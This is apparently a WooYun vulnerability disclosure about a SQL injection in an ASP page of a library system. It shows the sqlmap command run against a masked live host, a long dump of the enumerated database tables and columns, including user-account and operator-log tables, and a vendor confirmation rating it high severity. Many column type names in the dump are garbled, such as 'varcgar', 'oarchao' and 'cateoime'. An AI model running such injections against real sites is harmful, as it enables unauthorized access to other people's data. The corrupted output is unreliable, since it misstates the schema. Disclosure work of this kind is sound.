[20:15:25] [INFO] resumed: 13194
[20:15:25] [INFO] resumed: 3800
[20:15:25] [INFO] resumed: 3916
[20:15:25] [INFO] resumed: 8085
[20:15:25] [INFO] resumed: 1838
[20:15:25] [INFO] resumed: 16999
[20:15:25] [INFO] resumed: 3211
[20:15:25] [INFO] resumed: 18874
sqlmap.py -u "http://**.**.**.**/cb/QS_detail.asp?iAutoID=261" --tables --columns
Database: eLibrary
Table: dbo.syssegments
[3 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| name | varcgar |
| segment | ims |
| status | imt |
+---------+---------+
Database: eLibrary
Table: dbo.OperatorRegV
[8 columns]
+---------+----------+
| Column | Type |
+---------+----------+
| [SQL??] | varchar |
| [???] | varchar |
| [???IP] | varchar |
| [????] | datetime |
| [????] | rarchar |
| [????] | smallint |
| [??] | varchar |
| cID | varchar |
+---------+----------+
Database: eLibrary
Table: dbo.ESCOMTree602
[52 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| cCode | varchar |
| cCode1 | varchar |
| cCode2 | varchar |
| cCode3 | varchar |
| cCode4 | varchar |
| cCodeS | varchar |
| cFULName | varchar |
| cGLName | varchar |
| cMemo | varchar |
| cName | varchar |
| cRef1 | varchar |
| cRef2 | varchar |
| cRef3 | varchar |
| cRef4 | varchar |
| dCDate | datetime |
| dUDate | datetime |
| iAutoID | int |
| iCode1 | smallint |
| iCode10 | smallint |
| iCode2 | smallint |
| iCode3 | smallint |
| iCode4 | smallint |
| iCode5 | smallint |
| iCode6 | smallint |
| iCode7 | smallint |
| iCode8 | smallint |
| iCode9 | smallint |
| iID | int |
| iID1 | int |
| iID2 | int |
| iID3 | int |
| iID4 | int |
| iID5 | int |
| iID6 | int |
| iID7 | int |
| iID8 | int |
| iLevel | smallint |
| iParent1 | int |
| iParent10 | int |
| iParent2 | int |
| iParent3 | int |
| iParent4 | int |
| iParent5 | int |
| iParent6 | int |
| iParent7 | int |
| iParent8 | int |
| iParent9 | int |
| iTerminal | smallint |
| yAm1 | money |
| yAm2 | money |
| yAm3 | money |
| yAm4 | money |
+-----------+----------+
Database: eLibrary
Table: dbo.tUserAccount_Total
[6 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| bzh | varchar |
| bzm | varchar |
| cks | varchar |
| dys | varchar |
| id | decimal |
| zhrq | datetime |
+--------+----------+
Database: eLibrary
Table: dbo.Criter_oldCriter_split
[2 columns]
+-----------+---------+
| Column | Type |
+-----------+---------+
| CriterNum | rarcdar |
| OldCriter | rarcdar |
+-----------+---------+
Database: eLibrary
Table: dbo.gb2760
[6 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| bz | nvarchar |
| lb | nvarchar |
| mc | nvarchar |
| ndbs | nvarchar |
| syfw | nvarchar |
| zdsyl | nvarchar |
+--------+----------+
Database: eLibrary
Table: dbo.BookSub
[5 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| cDate | varchar |
| cEmployeID | varchar |
| cPreID | varchar |
| cSet | varchar |
| iAutoID | int |
+------------+---------+
Database: eLibrary
Table: dbo.BTab015
[9 columns]
+---------+----------+
| Column | Type |
+---------+----------+
| cCode | varchar |
| cID | varchar |
| cName | varchar |
| cNote | varchar |
| dDate | datetime |
| iAutoID | int |
| iCode | smallint |
| iStop | smallint |
| iType | smallint |
+---------+----------+
Database: eLibrary
Table: dbo.BookDetailV
[19 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| cAuthor | varchar |
| cBarCode | varchar |
| cBarMain | varchar |
| cBID103 | varchar |
| cBNa103 | varchar |
| cBNa403 | varchar |
| cBookNa | varchar |
| cCancelDate | varchar |
| cEmployeID1 | varchar |
| cEmployeID2 | varchar |
| cEmployeNa1 | varchar |
| cEmployeNa2 | varchar |
| cHowUse | varchar |
| cInDate | varchar |
| cNote | varchar |
| cOutDate | varchar |
| cPreID | varchar |
| cTargetDate | varchar |
| iAutoID | int |
+-------------+---------+
Database: eLibrary
Table: dbo.INetLogV
[5 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| [????] | varchar |
| [????] | int |
| [????] | varchar |
| [??IP] | varchar |
| [????] | datetime |
+--------+----------+
Database: eLibrary
Table: dbo.GetMaxBarMain
[5 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| cNote | varchar |
| cTableNa | varchar |
| dGDate | datetime |
| iAutoID | int |
| iMaxBarMain | int |
+-------------+----------+
Database: eLibrary
Table: dbo.BZ_PDF_Custom
[5 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| dCDate | datetime |
| fileName | uarchar |
| filePath | varchar |
| iAutoID | int |
| preID | int |
+----------+----------+
Database: eLibrary
Table: dbo.Tree201
[14 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| cCode | varchar |
| cCodeFull | varchar |
| cID | varchar |
| cIDFull | varchar |
| cName | varchar |
| cNameFull | varchar |
| cNote | varchar |
| cParentID | varchar |
| dDate | datetime |
| iAutoID | int |
| iIndex | smallint |
| iLast | smallint |
| iLevel | smallint |
| iStop | smallint |
+-----------+----------+
Database: eLibrary
Table: dbo.ESCOMUnit602
[30 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| cCode | varchar |
| cCode1 | varchar |
| cCode2 | varchar |
| cCode3 | varchar |
| cCode4 | varchar |
| cCode_R | varchar |
| cCodeS | varchar |
| cMemo | varchar |
| cName | varchar |
| cRef1 | varchar |
| cRef2 | varchar |
| cRef3 | varchar |
| cRef4 | varchar |
| cRef5 | varchar |
| cRef6 | varchar |
| cRef7 | varchar |
| cRef8 | varchar |
| dCDate | datetime |
| dUDate | datetime |
| iAutoID | int |
| iDisabled | int |
| iID | int |
| iID1 | int |
| iID2 | int |
| iID3 | int |
| iID4 | int |
| iID5 | int |
| iID6 | int |
| iID7 | int |
| iID8 | int |
+-----------+----------+
Database: eLibrary
Table: dbo.BookHistory
[8 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| cBarCode | varchar |
| cBID103 | varchar |
| cDate | varchar |
| cEmployeID1 | varchar |
| cEmployeID2 | varchar |
| cNote | varchar |
| cPreID | varchar |
| iAutoID | int |
+-------------+---------+
Database: eLibrary
Table: dbo.ESCOMUnit602_Tree
[5 columns]
+---------+----------+
| Column | Type |
+---------+----------+
| dDate | datetime |
| iAutoID | int |
| iID | int |
| iIDTree | int |
| iIsSet | int |
+---------+----------+
Database: eLibrary
Table: dbo.tUserAccount_Total3
[3 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| bzh | varchar |
| id | decimal |
| zhrq | datetime |
+--------+----------+
Database: eLibrary
Table: dbo.tUserAccount_Total2
[3 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| bzh | varchar |
| dys | varchar |
| id | decimal |
+--------+---------+
Database: eLibrary
Table: dbo.u_c
[3 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| [??] | varchar |
| [??id] | varcdar |
| [????] | varchar |
+--------+---------+
Database: eLibrary
Table: dbo.TreeMain
[7 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| cCnName | varchar |
| cNote | varchar |
| cTabName | varchar |
| dDate | datetime |
| iAutoID | int |
| iShowType | smallint |
| iSys | smallint |
+-----------+----------+
Database: eLibrary
Table: dbo.BTable_tmp
[2 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| code | int |
| name | varchar |
+--------+---------+
Database: eLibrary
Table: dbo.ESgb2760
[7 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| bz | varchar |
| iAutoID | int |
| lb | varchar |
| mc | varchar |
| ndbs | varchar |
| syfw | varchar |
| zdsyl | varchar |
+---------+---------+
Database: eLibrary
Table: dbo.BZ_top_cache
[10 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| cCancelDate | oarchao |
| CriterID | cecimal |
| CriterName | oarchao |
| CriterNum | oarchao |
| iAutoID | int |
| ImPleMentDate | narchan |
| InPutDate | parchar |
| iType | int |
| lastCheckTime | cateoime |
| Modiflag | varchar |
+---------------+----------+
Database: eLibrary
Table: dbo.PrintCriterV
[55 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| BackCode | varchar |
| cAuthorizNO | varchar |
| cBarcode | varchar |
| cCancelDate | varchar |
| cCriterName | varchar |
| cdeadline | varchar |
| cEnglishName | varchar |
| cGainDate | varchar |
| cGainID | varchar |
| cGainName | varchar |
| ChinaType | varchar |
| cIssueDate | varchar |
| cIssueID | varchar |
| cIssueName | varchar |
| cReclaimDate | varchar |
| cReclaimID | varchar |
| CriterID | decimal |
| CriterName | varchar |
| CriterNum | varchar |
| CriterNumber | varchar |
| EnglishName | varchar |
| EscAuthorizNO | varchar |
| EscIssueDate | varchar |
| EsfileName | varchar |
| EsiFile | int |
| EsiID | int |
| EsiNO | int |
| EsPDFExist | int |
| EsUpdate | varchar |
| iAutoID | int |
| ICsNum | varchar |
| iGainOut | int |
| iID | decimal |
| ImPleMentDate | varchar |
| IndexNum | varchar |
| InPutDate | varchar |
| InputPrDate | varchar |
| iReclaim | smallint |
| ItsNew | varchar |
| ModiFlag | varchar |
| ModifyNum | varchar |
| ModifyState | varchar |
| Money | money |
| OldCriter | varchar |
| OperDate | varchar |
| OperName | varchar |
| OperType | varchar |
| PageNum | int |
| Provider | varchar |
| Relation | varchar |
| RelationCode | varchar |
| ReMark | varchar |
| SaveNum | int |
| Type | varchar |
| YnForinCriter | varchar |
+---------------+-------
</code>

Proof of vulnerability:

[Screenshots: 8.png, 10.png, 11.png]

Remediation:

You know better than I do

Copyright notice: when reposting, please credit the source IceKing@WooYun


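Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-11-27 15:03

Vendor reply:

Thank you very much for your report.
The issue in the report has been confirmed and reproduced.
Data affected: High
Attack cost: Low
Impact: High
Overall rating: High, rank: 10
We are contacting the organization that administers the website to handle it.

Latest status:

None yet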